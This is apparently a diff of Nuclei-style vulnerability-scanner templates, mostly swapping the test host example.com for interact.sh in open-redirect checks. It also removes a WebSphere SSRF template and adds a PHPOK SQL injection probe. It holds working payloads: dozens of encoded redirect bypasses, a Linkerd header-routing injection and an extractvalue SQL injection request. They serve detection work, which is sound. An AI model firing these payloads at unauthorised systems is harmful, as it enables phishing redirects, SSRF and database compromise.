@ -15,94 +15,94 @@ requests:
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
redirect:
|
redirect:
|
||||||
- '%0a/example.com/'
|
- '%0a/interact.sh/'
|
||||||
- '%0d/example.com/'
|
- '%0d/interact.sh/'
|
||||||
- '%00/example.com/'
|
- '%00/interact.sh/'
|
||||||
- '%09/example.com/'
|
- '%09/interact.sh/'
|
||||||
- '%5C%5Cexample.com/%252e%252e%252f'
|
- '%5C%5Cinteract.sh/%252e%252e%252f'
|
||||||
- '%5Cexample.com'
|
- '%5Cinteract.sh'
|
||||||
- '%5cexample.com/%2f%2e%2e'
|
- '%5cinteract.sh/%2f%2e%2e'
|
||||||
- '%5c{{RootURL}}example.com/%2f%2e%2e'
|
- '%5c{{RootURL}}interact.sh/%2f%2e%2e'
|
||||||
- '../example.com'
|
- '../interact.sh'
|
||||||
- '.example.com'
|
- '.interact.sh'
|
||||||
- '/%5cexample.com'
|
- '/%5cinteract.sh'
|
||||||
- '////\;@example.com'
|
- '////\;@interact.sh'
|
||||||
- '////example.com'
|
- '////interact.sh'
|
||||||
- '///example.com'
|
- '///interact.sh'
|
||||||
- '///example.com/%2f%2e%2e'
|
- '///interact.sh/%2f%2e%2e'
|
||||||
- '///example.com@//'
|
- '///interact.sh@//'
|
||||||
- '///{{RootURL}}example.com/%2f%2e%2e'
|
- '///{{RootURL}}interact.sh/%2f%2e%2e'
|
||||||
- '//;@example.com'
|
- '//;@interact.sh'
|
||||||
- '//\/example.com/'
|
- '//\/interact.sh/'
|
||||||
- '//\@example.com'
|
- '//\@interact.sh'
|
||||||
- '//\example.com'
|
- '//\interact.sh'
|
||||||
- '//\texample.com/'
|
- '//\tinteract.sh/'
|
||||||
- '//example.com/%2F..'
|
- '//interact.sh/%2F..'
|
||||||
- '//example.com//'
|
- '//interact.sh//'
|
||||||
- '//example.com@//'
|
- '//interact.sh@//'
|
||||||
- '//example.com\texample.com/'
|
- '//interact.sh\tinteract.sh/'
|
||||||
- '//https://example.com@//'
|
- '//https://interact.sh@//'
|
||||||
- '/<>//example.com'
|
- '/<>//interact.sh'
|
||||||
- '/\/\/example.com/'
|
- '/\/\/interact.sh/'
|
||||||
- '/\/example.com'
|
- '/\/interact.sh'
|
||||||
- '/\example.com'
|
- '/\interact.sh'
|
||||||
- '/example.com'
|
- '/interact.sh'
|
||||||
- '/example.com/%2F..'
|
- '/interact.sh/%2F..'
|
||||||
- '/example.com/'
|
- '/interact.sh/'
|
||||||
- '/example.com/..;/css'
|
- '/interact.sh/..;/css'
|
||||||
- '/https:example.com'
|
- '/https:interact.sh'
|
||||||
- '/{{RootURL}}example.com/'
|
- '/{{RootURL}}interact.sh/'
|
||||||
- '/〱example.com'
|
- '/〱interact.sh'
|
||||||
- '/〵example.com'
|
- '/〵interact.sh'
|
||||||
- '/ゝexample.com'
|
- '/ゝinteract.sh'
|
||||||
- '/ーexample.com'
|
- '/ーinteract.sh'
|
||||||
- '/ーexample.com'
|
- '/ーinteract.sh'
|
||||||
- '<>//example.com'
|
- '<>//interact.sh'
|
||||||
- '@example.com'
|
- '@interact.sh'
|
||||||
- '@https://example.com'
|
- '@https://interact.sh'
|
||||||
- '\/\/example.com/'
|
- '\/\/interact.sh/'
|
||||||
- 'example%E3%80%82com'
|
- 'interact%E3%80%82sh'
|
||||||
- 'example.com'
|
- 'interact.sh'
|
||||||
- 'example.com/'
|
- 'interact.sh/'
|
||||||
- 'example.com//'
|
- 'interact.sh//'
|
||||||
- 'example.com;@'
|
- 'interact.sh;@'
|
||||||
- 'https%3a%2f%2fexample.com%2f'
|
- 'https%3a%2f%2finteract.sh%2f'
|
||||||
- 'https:%0a%0dexample.com'
|
- 'https:%0a%0dinteract.sh'
|
||||||
- 'https://%0a%0dexample.com'
|
- 'https://%0a%0dinteract.sh'
|
||||||
- 'https://%09/example.com'
|
- 'https://%09/interact.sh'
|
||||||
- 'https://%2f%2f.example.com/'
|
- 'https://%2f%2f.interact.sh/'
|
||||||
- 'https://%3F.example.com/'
|
- 'https://%3F.interact.sh/'
|
||||||
- 'https://%5c%5c.example.com/'
|
- 'https://%5c%5c.interact.sh/'
|
||||||
- 'https://%5cexample.com@'
|
- 'https://%5cinteract.sh@'
|
||||||
- 'https://%23.example.com/'
|
- 'https://%23.interact.sh/'
|
||||||
- 'https://.example.com'
|
- 'https://.interact.sh'
|
||||||
- 'https://////example.com'
|
- 'https://////interact.sh'
|
||||||
- 'https:///example.com'
|
- 'https:///interact.sh'
|
||||||
- 'https:///example.com/%2e%2e'
|
- 'https:///interact.sh/%2e%2e'
|
||||||
- 'https:///example.com/%2f%2e%2e'
|
- 'https:///interact.sh/%2f%2e%2e'
|
||||||
- 'https:///example.com@example.com/%2e%2e'
|
- 'https:///interact.sh@interact.sh/%2e%2e'
|
||||||
- 'https:///example.com@example.com/%2f%2e%2e'
|
- 'https:///interact.sh@interact.sh/%2f%2e%2e'
|
||||||
- 'https://:80#@example.com/'
|
- 'https://:80#@interact.sh/'
|
||||||
- 'https://:80?@example.com/'
|
- 'https://:80?@interact.sh/'
|
||||||
- 'https://:@\@example.com'
|
- 'https://:@\@interact.sh'
|
||||||
- 'https://:@example.com\@example.com'
|
- 'https://:@interact.sh\@interact.sh'
|
||||||
- 'https://:@example.com\@WillBeReplaced.com'
|
- 'https://:@interact.sh\@WillBeReplaced.com'
|
||||||
- 'https://;@example.com'
|
- 'https://;@interact.sh'
|
||||||
- 'https://\texample.com/'
|
- 'https://\tinteract.sh/'
|
||||||
- 'https://example.com/example.com'
|
- 'https://interact.sh/interact.sh'
|
||||||
- 'https://example.com/https://example.com/'
|
- 'https://interact.sh/https://interact.sh/'
|
||||||
- 'https://www.\.example.com'
|
- 'https://www.\.interact.sh'
|
||||||
- 'https:/\/\example.com'
|
- 'https:/\/\interact.sh'
|
||||||
- 'https:/\example.com'
|
- 'https:/\interact.sh'
|
||||||
- 'https:/example.com'
|
- 'https:/interact.sh'
|
||||||
- 'https:example.com'
|
- 'https:interact.sh'
|
||||||
- '{{RootURL}}example.com'
|
- '{{RootURL}}interact.sh'
|
||||||
- '〱example.com'
|
- '〱interact.sh'
|
||||||
- '〵example.com'
|
- '〵interact.sh'
|
||||||
- 'ゝexample.com'
|
- 'ゝinteract.sh'
|
||||||
- 'ーexample.com'
|
- 'ーinteract.sh'
|
||||||
- 'ーexample.com'
|
- 'ーinteract.sh'
|
||||||
- '?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com'
|
- '?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh'
|
||||||
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
@ -111,7 +111,7 @@ requests:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -15,13 +15,13 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/redirect-to?url=https%3A%2F%2Fexample.com"
|
- "{{BaseURL}}/redirect-to?url=https%3A%2F%2Finteract.sh"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'location == "https://example.com"'
|
- 'location == "https://interact.sh"'
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -1,29 +0,0 @@
|
||||||
id: ibm-websphere-ssrf
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: IBM WebSphere Portal SSRF
|
|
||||||
author: pdteam
|
|
||||||
severity: high
|
|
||||||
reference:
|
|
||||||
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
|
|
||||||
tags: ibm,ssrf,websphere
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- method: GET
|
|
||||||
path:
|
|
||||||
- '{{BaseURL}}/docpicker/internal_proxy/http/example.com'
|
|
||||||
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com'
|
|
||||||
|
|
||||||
redirects: true
|
|
||||||
max-redirects: 2
|
|
||||||
stop-at-first-match: true
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
||||||
- type: word
|
|
||||||
words:
|
|
||||||
- "<title>Example Domain</title>"
|
|
|
@ -13,7 +13,7 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
headers:
|
headers:
|
||||||
l5d-dtab: /svc/* => /$/inet/example.com/443
|
l5d-dtab: /svc/* => /$/inet/interact.sh/443
|
||||||
|
|
||||||
matchers-condition: or
|
matchers-condition: or
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -12,10 +12,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://example.com/"
|
- "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://interact.sh/"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
|
|
|
@ -1,19 +1,18 @@
|
||||||
id: CVE-2020-22210
|
id: 74cms-sqli
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: 74cms Sql Injection
|
name: 74cms Sql Injection
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: critical
|
severity: critical
|
||||||
description: A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.
|
description: A SQL injection vulnerability exists in 74cms 5.0.1 AjaxPersonalController.class.php.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-22210
|
- https://github.com/possib1e/vuln/issues/3
|
||||||
- https://github.com/blindkey/cve_like/issues/11
|
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 9.8
|
cvss-score: 9.8
|
||||||
cve-id: CVE-2020-22210
|
cve-id: CVE-2020-22210
|
||||||
cwe-id: CWE-89
|
cwe-id: CWE-89
|
||||||
tags: cve,cve2020,74cms,sqli
|
tags: 74cms,sqli
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -27,3 +26,4 @@ requests:
|
||||||
part: body
|
part: body
|
||||||
|
|
||||||
# Enhanced by mp on 2022/03/02
|
# Enhanced by mp on 2022/03/02
|
||||||
|
# Enhanced by ritikchaddha on 2022/05/05
|
|
@ -9,10 +9,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569"
|
- "{{BaseURL}}/gotoURL.asp?url=interact.sh&id=43569"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$'
|
- '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*)$'
|
|
@ -12,25 +12,25 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/bitrix/rk.php?goto=https://example.com'
|
- '{{BaseURL}}/bitrix/rk.php?goto=https://interact.sh'
|
||||||
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com'
|
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh'
|
||||||
- '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://example.com'
|
- '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://interact.sh'
|
||||||
- '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com'
|
- '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh'
|
||||||
- '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com'
|
- '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh'
|
||||||
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com'
|
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh'
|
||||||
- '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com'
|
- '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh'
|
||||||
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com'
|
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh'
|
||||||
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com'
|
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh'
|
||||||
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com'
|
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh'
|
||||||
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
|
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
|
||||||
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
|
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
|
||||||
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
part: header
|
part: header
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
|
|
|
@ -14,13 +14,13 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo="
|
- "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9pbnRlcmFjdC5zaA=="
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Location: https://evil.com"
|
- "Location: https://interact.sh"
|
||||||
part: header
|
part: header
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
|
|
|
@ -12,10 +12,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/"
|
- "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -13,10 +13,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/website/lang/en_US?r=https://example.com/"
|
- "{{BaseURL}}/website/lang/en_US?r=https://interact.sh/"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -13,10 +13,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com'
|
- '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.interact.sh'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
|
@ -0,0 +1,21 @@
|
||||||
|
id: phpok-sqli
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PHPOK - Sql Injection
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: high
|
||||||
|
metadata:
|
||||||
|
fofa-query: app="phpok"
|
||||||
|
tags: phpok,sqli
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{randstr}}))) --+"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '{{md5("{{randstr}}")}}'
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue